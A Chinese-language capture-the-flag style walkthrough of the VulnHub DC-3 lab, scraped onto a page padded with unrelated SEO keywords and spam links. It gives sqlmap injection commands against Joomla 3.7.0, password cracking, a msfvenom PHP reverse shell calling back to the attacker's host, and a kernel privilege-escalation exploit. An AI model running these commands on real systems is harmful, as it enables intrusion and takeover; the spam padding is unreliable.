当前位置: 首页 > news >正文

合肥市建设工程造价管理站网站个人网站不备案

news 2025/10/1 4:28:13
合肥市建设工程造价管理站网站,个人网站不备案,网页制作的软件,公众号开发价钱文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 靶场下载地址:https://download.vulnhub.com/dc/DC-3-2.zip kali:192.168.144.148 DC-3.2:192.168.144.151 更改驱动器连接设置: 二、渗透流程 1、信息收集nmap -T5 -…

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结

一、环境搭建

靶场下载地址:https://download.vulnhub.com/dc/DC-3-2.zip
kali:192.168.144.148
DC-3.2:192.168.144.151

更改驱动器连接设置:

二、渗透流程

1、信息收集 
nmap -T5 -sV -sT -p- -A 192.168.144.151
2、探测网站内容

1.访问192.168.144.151


2.web指纹扫描如下

网站使用joomla CMS,使用joomscan工具扫描
joomscan --url 192.168.144.151
点击了解👉joomscan扫描工具使用详解


3.漏洞获取

可用信息:获取到joomla版本3.7.0>寻找相关版本漏洞:searchsploit joomla 3.7.0 -w
搜索结果显示两个漏洞:
CVE-2015-8562 反序列化漏洞:https://www.exploit-db.com/exploits/43488
CVE-2017-8917 SQL注入漏洞:https://www.exploit-db.com/exploits/42033


CVE-2015-8562 反序列化漏洞
CVE-2017-8917 SQL注入漏洞

3、 CVE-2017-8917 SQL注入漏洞利用

exploits-db数据库记录了详细的利用过程,如下:


1.获取数据库

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


2.joomladb数据库的表

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables


3.“#__users” 表的字段

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump


4.密码解密

password采用bcrypt加密
👉bcrypt加密算法详解
使用john破解密码:snoopy
vi创建dc-3.2,将密码保存到dc-3.2
john爆破密码 john dc-3.2 --show 密码为:snoopy


5.进入后台

admin:snoopy登陆后台地址:http://192.168.144.151/administrator

4、获取权限


1.生成反弹shell
将shell内容复制到刚创建的dc.php文件中

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.144.148 LPORT=4444 > dc.php


2.kali开启监听:

use exploit/multi/handler
set payload /php/meterpreter/reverse_tcp
set LHOST 192.168.144.148
set LPORT 4444
run


3.访问webshell地址
http://192.168.144.151/templates/protostar/dc.php


4.获取临时shell

shell  #获取临时shell 
python -c 'import pty;pty.spawn("/bin/bash")'    #交互式shell
5、提权


1.获取服务器版本

uname -a
lsb_release -a


2.ubuntu 16.04 相关漏洞

searchsploit ubuntu 16.04


3.下载提权exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt


4.通过蚁剑将exploit.tar上传至脚本所在目录
在这里插入图片描述

5.解压exploit.tar
在这里插入图片描述

6.获取root权限
在这里插入图片描述

三、思路总结

1、只开放80端口的情况下,网站指纹、目录扫描等方向
2、通过网站CMS版本信息搜索相关版本漏洞
3、利用版本SQL注入漏洞获取后台登录账号密码
4、后台寻找webshell插入地址
5、获取shell,寻找服务器版本漏洞
6、利用服务器版本漏洞提权

参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC3

http://www.laogonggong.com/news/66863.html

相关文章:

  • 企业网站建立流程做网站网络合同
  • 什么直播可以做游戏视频网站服务器ip域名解析
  • 广东网站优化外链网站 英文
  • 番禺网站开发哪家专业新宫网站建设公司
  • 网站存在风险什么意思下载天马行市民云app
  • 网站上线多少钱企业网站 个人备案
  • html5手机app网站模板免费下载帮人做违法网站
  • 威县做网站哪里便宜广州网页设计网站
  • 德州做网站公司沈阳网络优化培训
  • 晋江网站建设联系电话在东莞怎么找工作
  • 网站开发时间进度信息型网站
  • 湛江网站建设优化推广wordpress设置邮件提醒
  • 网站建设1000字网站推广策略包括哪些内容
  • 网站布局策划的流程运城手机网站建设
  • 用vs2008做网站视频教程企业平台网站建设
  • 濮阳做网站 汉狮网络有帮忙做儿童房设计的网站吗
  • 泉州网站搭建黄山购物网站建设
  • 成都市seo网站公司梅州高铁
  • 上海高端点网站建设制作公司有哪些?|网站建设深圳企业网络推广运营技巧
  • 找什么人做公司网站东圃做网站
  • 惠州网站设计培训厚街做网站
  • 资料查询网站建设企业网站建设需要哪些软件
  • 南昌购物网站制作广州安全教育平台入口登录
  • 小程序怎么开发自己的小程序代码网站代码seo优化
  • 易企网络网站建设长春模板自助建站
  • 网站制作哪些分类怎么制作网站商城
  • 怎么经营团购网站广西网站建设的公司哪家好
  • 网站建设哪个平台最好电子商务网站建设背景
  • 网站维护包括的内容网站图片有什么要求吗
  • 如何建立虚拟架构网站网站嵌入百度地图